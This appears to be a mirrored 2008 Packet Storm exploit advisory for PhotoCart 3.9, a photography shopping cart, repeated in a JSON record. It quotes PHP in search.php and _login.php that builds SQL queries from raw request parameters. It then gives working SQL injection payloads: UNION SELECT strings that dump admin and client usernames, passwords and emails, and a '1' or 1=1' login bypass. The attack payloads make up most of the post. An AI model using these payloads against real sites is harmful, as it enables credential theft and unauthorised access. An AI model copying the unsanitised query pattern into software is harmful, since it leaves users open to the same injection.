Search...

photocart-sql.txt

2008-08-22T00:00:00

ID PACKETSTORM:69301
Type packetstorm
Reporter ~!Dok_tOR!~
Modified 2008-08-22T00:00:00

Description

                                        
                                            `Author: ~!Dok_tOR!~  
Date found: 18.08.08  
Product: PhotoCart  
Version: 3.9 возможно и более ранние версии  
Type: Photography Shopping Cart  
URL: www.picturespro.com  
Vulnerability Class: SQL Injection  
  
/[installdir]/search.php  
  
Vuln code:  
  
PHP:  
if($_REQUEST['searchby'] == "qtitle") {  
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";  
print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";  
}  
if($_REQUEST['searchby'] == "qid") {  
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";  
print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";  
}  
if($_REQUEST['searchby'] == "qdate") {  
$gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";  
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";  
print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";  
}  
  
  
magic_quotes_gpc = Off  
  
Example:  
http://[server]/[installdir]/search.php  
  
Вводим в поле Gallery or event name:  
  
Exploit 1:  
  
' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*  
  
  
  
Exploit 2:  
  
' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/*  
  
  
  
Authentication Bypass SQL Injection  
  
/[installdir]/_login.php  
  
Vuln code:  
  
PHP:  
$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");  
  
  
Email Address: 1' or 1=1/*  
Password: 1' or 1=1/*  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:69301", "type": "packetstorm", "bulletinFamily": "exploit", "title": "photocart-sql.txt", "description": "", "published": "2008-08-22T00:00:00", "modified": "2008-08-22T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/69301/photocart-sql.txt.html", "reporter": "~!Dok_tOR!~", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:14", "viewCount": 1, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2016-11-03T10:16:14", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:14", "rev": 2}, "vulnersScore": -0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/69301/photocart-sql.txt", "sourceData": "`Author: ~!Dok_tOR!~ \nDate found: 18.08.08 \nProduct: PhotoCart \nVersion: 3.9 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \nType: Photography Shopping Cart \nURL: www.picturespro.com \nVulnerability Class: SQL Injection \n \n/[installdir]/search.php \n \nVuln code: \n \nPHP: \nif($_REQUEST['searchby'] == \"qtitle\") { \n$gal_where['where'] = \"WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%\".$_REQUEST['qtitle'].\"%' \"; \nprint \"Results for Gallery or event name: \".$_REQUEST['qtitle'].\" \"; \n} \nif($_REQUEST['searchby'] == \"qid\") { \n$gal_where['where'] = \"WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='\".$_REQUEST['qid'].\"' \"; \nprint \"Results for Gallery or event ID: \".$_REQUEST['qid'].\" \"; \n} \nif($_REQUEST['searchby'] == \"qdate\") { \n$gdate = \"\".$_REQUEST['qyear'].\"-\".$_REQUEST['qmonth'].\"-\".$_REQUEST['qday'].\"\"; \n$gal_where['where'] = \"WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' \"; \nprint \"Results for Gallery or event date: \".$_REQUEST['qmonth'].\"-\".$_REQUEST['qday'].\"-\".$_REQUEST['qyear'].\" \"; \n} \n \n \nmagic_quotes_gpc = Off \n \nExample: \nhttp://[server]/[installdir]/search.php \n \n\u0412\u0432\u043e\u0434\u0438\u043c \u0432 \u043f\u043e\u043b\u0435 Gallery or event name: \n \nExploit 1: \n \n' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/* \n \n \n \nExploit 2: \n \n' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/* \n \n \n \nAuthentication Bypass SQL Injection \n \n/[installdir]/_login.php \n \nVuln code: \n \nPHP: \n$result = @mysql_query(\"SELECT * FROM pc_clients WHERE client_email='\".$_REQUEST['email'].\"' AND client_pass='\".$_REQUEST['password'].\"'\"); \n \n \nEmail Address: 1' or 1=1/* \nPassword: 1' or 1=1/* \n`\n"}